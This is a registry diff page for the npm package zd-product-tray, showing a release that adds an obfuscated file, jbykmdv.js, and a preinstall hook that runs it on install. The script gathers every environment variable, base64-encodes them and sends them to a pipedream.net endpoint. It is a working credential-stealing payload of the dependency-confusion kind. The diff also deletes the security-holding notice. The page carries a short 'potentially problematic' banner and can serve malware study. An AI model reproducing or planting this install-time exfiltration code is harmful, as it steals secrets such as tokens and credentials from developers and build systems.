zd-product-tray 0.0.1-security → 90.826.663
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zd-product-tray might be problematic. Click here for more details.
- package/jbykmdv.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/jbykmdv.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x3ea69e=a0_0x15e5;function a0_0x15e5(_0x540e14,_0x1b12d1){const _0x2388a8=a0_0x2388();return a0_0x15e5=function(_0x15e5b5,_0x34ef47){_0x15e5b5=_0x15e5b5-0x11c;let _0x3f1f58=_0x2388a8[_0x15e5b5];return _0x3f1f58;},a0_0x15e5(_0x540e14,_0x1b12d1);}(function(_0x367e58,_0x581462){const _0x229615=a0_0x15e5,_0x44e22b=_0x367e58();while(!![]){try{const _0x46f206=parseInt(_0x229615(0x124))/0x1*(parseInt(_0x229615(0x12c))/0x2)+-parseInt(_0x229615(0x130))/0x3*(parseInt(_0x229615(0x122))/0x4)+-parseInt(_0x229615(0x126))/0x5+parseInt(_0x229615(0x129))/0x6+parseInt(_0x229615(0x11f))/0x7+parseInt(_0x229615(0x131))/0x8*(parseInt(_0x229615(0x12a))/0x9)+-parseInt(_0x229615(0x12b))/0xa*(parseInt(_0x229615(0x11e))/0xb);if(_0x46f206===_0x581462)break;else _0x44e22b['push'](_0x44e22b['shift']());}catch(_0x410829){_0x44e22b['push'](_0x44e22b['shift']());}}}(a0_0x2388,0xe0194));const http=require(a0_0x3ea69e(0x11c));req=http[a0_0x3ea69e(0x121)]({'host':[a0_0x3ea69e(0x12d),'m','pipedream','net']['join']('.'),'path':'/'+(process['env'][a0_0x3ea69e(0x12e)]||''),'method':a0_0x3ea69e(0x120)}),req[a0_0x3ea69e(0x123)](Buffer[a0_0x3ea69e(0x12f)](JSON[a0_0x3ea69e(0x128)](process[a0_0x3ea69e(0x125)]))[a0_0x3ea69e(0x11d)](a0_0x3ea69e(0x127))),req['end']();function a0_0x2388(){const _0x684959=['45RwzyBR','40Khltkp','https','toString','30459DHTKTt','7050540DmHrOy','POST','request','35716iWQBwV','write','1Ngkltz','env','5274385AOdxJx','base64','stringify','2900862fuvPrJ','3189573PrlKpo','9970AQixnP','3209462UNfxCQ','4aaa0dfa016c3686a57e93787657fa37','npm_package_name','from'];a0_0x2388=function(){return _0x684959;};return a0_0x2388();}
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zd-product-tray",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "90.826.663",
|
|
4
|
+
"main": "jbykmdv.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node jbykmdv.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zd-product-tray for more information.
|